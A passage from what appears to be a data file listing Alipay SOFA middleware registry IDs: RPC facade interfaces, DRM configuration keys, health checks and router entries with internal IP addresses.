","com.alipay.kbservindustryprod.common.service.facade.alsc.shop.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.asset.api.InsGroupMemberFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.security.facade.finance.service.FinanceService:1.0:dpsecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:bkuctmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mirrorprod.facade.gateway.service.MirrorProdProxyFacade:1.0:imirrorprod_zproxy_dispatcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileappcommon.common.service.facade.baas.HotpatchReviewMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_BAOXIANGW#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","HEALTHY_V2@finriskmatrix#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.settlequery.common.service.facade.deposit.api.DepositInstructionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.ding.DingGroupChatQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.common.service.facade.api.process.ProcessNodeConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_MEMBERCENTER#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.bizrecon.DataGrabFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lendpofprod.common.service.facade.loanapi.repay.LoanRepayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.forexprod.common.service.facade.ForexTradeStandardCreateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mif_syncOrderAntProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:wxSignPushOrderStatusNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbmaterialcenter.common.service.facade.api.material.MaterialPrincipalRelationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.cide.common.service.facade.api.ResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcic.service.facade.ProcessorManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.SimulateModeFixedData2NewDrmImpl.finpwmExecuteLogJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.intclcn.common.service.facade.AssetPriceClcnFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.prodquery.common.service.api.arrangement.ArrangementQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.huanyu.facade.change.ChangePlanCallback:1.0:darwin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:scfmngAccountSettingCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.omoaidbase.common.service.facade.api.PCSecurityPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.RCacheServerTBaseCache.nativeRuleZones,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rinsight.common.base.spi.RinsightListDataRpcSpi:1.0:merchantDataLinkRpcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.ScenceService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.PortalAppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_RTASK#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kabaoprod.biz.mwallet.pass.manager.KabaoStandardUnitManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmOpenapiConfig.crowdMatchClosedPidStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.netValueCalcDebugger,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.0.156.72#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.distinguishprod.biz.invoice.service.InvoicePayerIdInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.174.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.etetestcore.etetestcoreDataSource.validator,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue24#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","SOFA_PRC_TRANSMIT_DMETA#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.meshyorg.common.service.facade.api.DataReportPermissionFacade:1.0:orgDataReportPermissionFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqualitywalleetoe.common.service.facade.linkide.api.LinkIDEDataTrackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTair.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promobench.common.service.facade.service.AntWorkInformManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mctlib.common.facade.intf.MerchantDataLinkService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fporgassetdecision.common.service.facade.api.PkgConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.244.49#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promoplaycenter.common.assist.facade.api.AssistFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.32.19#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.switchToNewMethod,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialportal.web.task.rpc.facade.activity.RedPacketActivityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:promobffweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.153.153#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finatp.common.service.facade.auto.result.ExecResultQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:aeicoreAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inslifecore.common.service.plan.InsLifePlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ecsign.common.service.facade.sign.DataPrepareProFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revcore.common.service.facade.api.report.ReportTaskService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.core.service.permission.UserRolePermissionCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S_zintclcn_acrtrans#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.acctransquery.common.service.facade.api.PartnerAccountLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.test.sub2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.CtuEventBaseLineService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlaw.common.service.facade.api.SystemConfigFacade:1.0:alcorporation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardUnionFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitysimulate.common.service.client.antq.AntqMsgConsumer:1.0:punishcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.transferprod.common.service.facade.api.TimeoutCallbackFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.recNeptuneRecActivityConfigInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scardcenter.common.service.facade.OfflinepayCardSceneRzFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlaw.common.service.facade.api.OUService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpwm.facade.service.CapitalPlanQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.xview.core.common.drm.CacheConsistSwitch.rateStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finfocore:name=com.alipay.checkroute.common.service.datacollect.HADataClientConfigDrm.reloadCollectConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instriskcenter.facade.api.RiskNotifyConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsearch.common.service.facade.api.evaluate.BuffettRivalShopInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpLoadtestTairRz.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ivbprod.service.facade.api.UserRegisterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paylink.service.facade.OrderViewQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:openhome@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_S_INSTTRADE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.38.44.84#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.linka:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.vmEmergencyActions,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cloudbox:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iotbsp.business.facade.content.TemplateService:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqapi.facade.yqapi.YuqingDataConsumeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:uniontrade@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.adbizopt.common.service.facade.transfer.SmartPriceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arater.common.service.triple.RateQueryConsumeStatus:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY@gmportal#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","DATA_ID_30.50.26.59#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.alm.service.facade.facade.FuncManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assetfluxdecision.biz.service.consult.AssetAllocationConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alipaypointcust.common.service.facade.card.service.CustomerCenterPointCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.socialcore.facade.taskcenter.TaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pointprod.commom.manage.facade.budget.api.BudgetQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sync.ipayment#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.CapitalPlanManageConfigDrmImpl.allowTransInOnTheDay,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Sub_Servers_TP_S_BKLOANREPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.ptcore.common.service.facade.api.ptemplate.ProductTemplateSsuGroupConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliinvoiceprod.core.service.serial.SerialGenerateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashiercore.service.facade.api.CashierOrderManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.inshealthmarket.common.service.facade.service.LotteryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.drm.SlaveQueryDrm.wFinContractCountInsert,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.MiniCacheService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.common.service.facade.HomeWorkOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.tool.InsIopUserListMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.MacDRMResource.nebulaSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_configEditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pcmerchantprod#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:http://mpafront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_CONSUMEX#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ap.gloanuserproxy.facade.api.ArNoMappingQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:groupFundsSettleExecuter$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:govbizwebdeploy@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antprocess_FapResearchReportHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sync.ldcpublic#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.downgradeSprDetailProfitPlanIdList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.linka:name=com.alipay.common.security.dresource.SecurityCommonDrm.escapeSchemeChecks,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.88.159.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.taskcenter.common.service.facade.TaskQueryService:1.0:sofa4@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.ebppcore.drm.LDCFlowCtrlResource.flowCtr,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_192.168.33.1#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.csguide.service.facade.api.GuideDecisionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.common.service.facade.api.CeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instopen.service.facade.taskcenter.TaskCenterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.migratedrmhandler.queryCondition,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.cif.client.drm.TairToTbaseSwitch.tbaseRouteGrayMethodsSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_F_IACCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antgroup.zmxy.creditacceptance.common.service.facade.ZmOpenRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iecpprod.common.service.facade.api.UserQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openaccess.common.quickaccess.facade.service.openapi.ProcessOutsideHandleFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.xview.core.common.facade.CacheQueryProviderService:1.0:pcreditagreement@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_P_DPC_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchorder.common.service.facade.consumerecord.OrderViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditdecision.service.PcreditOrgConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csaccurate.service.facade.mng.api.GuideCacheQueryService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.172.0#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.mychain.baas.logistic.finance.rpc.LFUserCheckRpc:1.0:dev@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openinsight.common.openplatform.facade.dataservice.api.DataServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.user.SecuUserManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.YuemaContentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.64.114#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.15.252.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.revcore.finaccenter_ds.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileha.core.service.activity.ActivityControlRiskDomainService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:secretcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.24.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.45.74.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acparamcore.client.api.ParamClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.ldcVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tscenter.common.service.facade.DeviceQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.mmng.drm.FuCardDrm.cardTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.routeclient.interfacename:envmap#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.admgr.common.service.facade.PromoteSeniorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskmngcore.common.service.facade.api.QuotaServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.DataLoadService:1.0:finfundcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.IsvMerchantBizBelongQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.24.8.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.217.238#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insusercenter.client.policydetail.fetcher.PolicyBizInfoFetcher:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:instpayOutSyncTransCallBack@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.airbops.biz.changemng.drm.ChangemngDrmConfig.listFormat2,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:pcardcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iecpprod.common.service.facade.api.TransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlsmicrogw.common.service.facade.gateway.api.MicroServiceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:apshopcenter#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.pdcore.common.service.facade.item.api.NewSsuQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.200.218#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imtmsvcprod.common.service.facade.dapply.ParkingInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.KatongChannelApiRuleQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableLoadTestIsland,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifeprod.common.service.facade.api.operation.LifeOperationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.EmailConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.client.api.ApiTestFacade:1.0:openitemcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcshield.common.service.facade.fpdecision.FpEngineService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tss.ability.disposal.facade.BenefitParticipateActivityOPSFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icsmng.service.facade.user.QueryUserSummaryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.rest.ModelDelegateHttpRest#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.ipromotion.common.service.facade.api.campaignv2.ExchangeCampQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.resource.ResourceTraceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zeus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:clearingcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilebc.common.service.facade.component.spi.common.ComponentMeteDataConsultCallbackFacade:1.0:pcreditprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdeclarecenter.core.dispatch.service.task.DispatchTaskHandleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.antbuservice:name=com.alipay.zcache.log.antbuservice.logLevel,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdistinguish.common.service.facade.SmartPosterServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.mq.MQRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.cfin.cfaccounting.facade.cut.AccountingDailyCutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.acceptRejectedUserList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSchedulerDRMResource.wfinUserCountGrayUidNos,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.159.249.162#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.certifymng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCustCertifyInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mfinsnsprod.service.facade.api.ProdDraftFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.coreQualityPlus.common.facade.service.api.MemberComponentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@pcreditmerchant#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.initiativeYebTransInSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.financemng.common.service.integration.fintradecenter.SettingEndowmentChangeMaturityWayFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.enableDataCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.certifymng.revolmng.service.facade.SofaReferenceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcateringprod.common.service.facade.activity.api.MovehomeActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.244.5#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.240.165#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.findecision.common.service.facade.task.TaskDispatchMngServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.ActionLogGzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.crmhome.common.service.integration.biscenter.UEMOperationPermissionQueryServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:sdchecker@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:miniselfop@DEFAULT#